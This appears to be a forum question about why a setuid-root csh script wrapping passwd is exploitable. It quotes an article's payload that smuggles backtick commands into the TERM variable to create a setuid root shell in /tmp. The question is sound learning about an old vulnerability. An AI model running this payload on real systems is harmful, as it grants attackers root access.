In this article, it says that this C-shell script:
#!/bin/csh -b
set user = $1
passwd $user
With these permissions:
-rwsr-x--- 1 root helpdesk
Is vulnerable because one can manipulate env variables, like:
env TERM='`cp /bin/sh /tmp/sh;chown root /tmp/sh;chmod 4755/tmp/sh`' change-pass
But I really don't see what the TERM env var has to see with all this. Do you have any explanation?
